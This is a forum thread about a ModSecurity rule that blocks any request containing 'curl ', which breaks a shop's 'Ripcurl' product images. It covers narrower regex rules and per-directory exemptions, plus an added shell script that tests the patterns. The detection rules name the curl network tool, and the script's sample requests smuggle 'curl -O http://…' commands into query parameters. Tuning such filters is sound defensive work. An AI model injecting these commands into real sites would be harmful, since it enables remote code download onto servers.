
Using curl ruleset on modsec gives my client's images trouble loading

Discussion in 'Security' started by isputra, Aug 20, 2006.

  1. isputra

    isputra Well-Known Member

    Hi,

    I use modsec and one of the rulesets is:

    SecFilterSelective THE_REQUEST "curl "

    This ruleset will deny all images using the "curl" name from showing.

    Example:
    /Others/Sendal%20Ripcurl%20Man%20woman.jpg HTTP/1.1 | Access denied with code 406. Pattern match "curl " at THE_REQUEST

    My client has a shopcart that sells ripcurl products, and none of the images can show in the browser because of this ruleset.

    Is there any way to avoid this without changing the image names?

    Thanks
     
  2. isputra

    isputra Well-Known Member

    Does anyone have a solution for this issue?
     
  3. imran_kh

    imran_kh Registered

    just recompile php with full curl support :)
     
  4. isputra

    isputra Well-Known Member

    Please read my first post again.

    This problem is about mod_sec blocking all file names that contain "curl" because of the SecFilterSelective THE_REQUEST "curl " mod_sec rule.

    I think this is not relevant to recompiling PHP with full curl support. But just for your information, my PHP already has full curl support :)
     
  5. jamesbond

    jamesbond Well-Known Member

    Just using common English words like that will cause you problems.

    Since (I believe) you can't run any effective curl commands without options (curl -O etc.) you can add the minus sign (-) to the rule.

    You could try something like this:
    Code:
    SecFilterSelective THE_REQUEST "curl[[:space:]]+-"
    Another option is to use the 'chain' feature in mod_security to combine rules.

    Your logs will give you a good idea also as to what rule will be effective or not. Just scan your logs for curl exploits and apply that information to create an effective rule.
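
Added example, not part of the original posts: a shell check that runs the original pattern and the narrower pattern from the reply above against sample request lines, with `grep -E` standing in for the rule engine's regex matching. Apart from the image request taken from the thread's log entry, the request lines, the variable and function names and `example.invalid` are constructed for illustration, and only `%20` is decoded.

```shell
#!/bin/sh
# Added example: grep -E stands in for the rule engine's regex matching.

OLD_PATTERN='curl '              # original rule from the first post
NEW_PATTERN='curl[[:space:]]+-'  # narrower rule suggested in the reply

# Simplified normalization (assumption): decode only %20, which is all the
# sample request lines below need.
normalize() {
    printf '%s\n' "$1" | sed 's/%20/ /g'
}

# verdict PATTERN REQUEST_LINE -> prints "deny" if the pattern matches, else "allow"
verdict() {
    if normalize "$2" | grep -Eq -e "$1"; then
        echo deny
    else
        echo allow
    fi
}

# IMG is the request from the thread's log entry; the others are constructed.
IMG='GET /Others/Sendal%20Ripcurl%20Man%20woman.jpg HTTP/1.1'
IMG_DASH='GET /Jacket/Ripcurl%20-%20Blue.jpg HTTP/1.1'
CMD_OPT='GET /page.php?x=curl%20-O%20http://example.invalid/f HTTP/1.1'
CMD_BARE='GET /page.php?x=curl%20http://example.invalid/f HTTP/1.1'

# Print one row per sample: what each pattern would do with it.
report() {
    printf '%-10s %-6s %-6s\n' sample old new
    for name in IMG IMG_DASH CMD_OPT CMD_BARE; do
        eval "line=\$$name"
        printf '%-10s %-6s %-6s\n' "$name" \
            "$(verdict "$OLD_PATTERN" "$line")" "$(verdict "$NEW_PATTERN" "$line")"
    done
}

report
```

The narrower pattern lets the logged image through, but it still denies a file name with a dash after "curl" and no longer matches a request where no option follows the command, so both cases are worth checking against real logs before deploying the rule.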
     
  6. sparek-3

    sparek-3 Well-Known Member

    The best solution is to use ids for all of your mod security rules, something like:

    SecFilterSelective THE_REQUEST "curl " id:1000,deny,log,status:406

    This gives anything that matches this mod_security rule the ID 1000.

    Now in your httpd.conf file, in the VirtualHost container for this specific account add:

    <IfModule mod_security.c>
    <Location /Others>
    SecFilterRemove 1000
    </Location>
    </IfModule>


    The <Location> container is not completely necessary, but it helps localize the issue. However, this also means that should an exploitable script exist in the /Others directory, then it can be used to execute curl commands, because files in that directory are exempt from the mod_security rule id 1000 (curl). If you don't use the <Location> container, then this means that any script in the VirtualHost would be exempt from the curl mod_security rule.
     
  7. isputra

    isputra Well-Known Member

    What if my user has 3 directories for his files? E.g. Others, Jacket, and Surfboard

    What must I add to <Location>? Is it <Location /Others; /Jacket; /Surfboard>?
     
    #7 isputra, Aug 28, 2006
    Last edited: Aug 28, 2006
  8. sparek-3

    sparek-3 Well-Known Member

    You would do something like:

    <IfModule mod_security.c>
    <Location /Others>
    SecFilterRemove 1000
    </Location>
    <Location /Jacket>
    SecFilterRemove 1000
    </Location>
    <Location /Surfboard>
    SecFilterRemove 1000
    </Location>
    </IfModule>


    You would need a separate <Location> container for each directory. If you have a bunch of files that are affected by this rule, then you might consider leaving the <Location> containers out and just using something like:

    <IfModule mod_security.c>
    SecFilterRemove 1000
    </IfModule>


    That would exempt the entire VirtualHost from the curl rule, which could open it for exploiting if the account has any outdated or vulnerable scripts installed. Or you could do as others have suggested and be more descriptive in your mod_security rule.

    There really just isn't a black and white way of doing this. This is all just a gray area. How much security do you want to provide? Where do you draw the line with security versus website usability? If an account is not able to use anything on the account because of your security measures, then your security measures are probably too strict.
     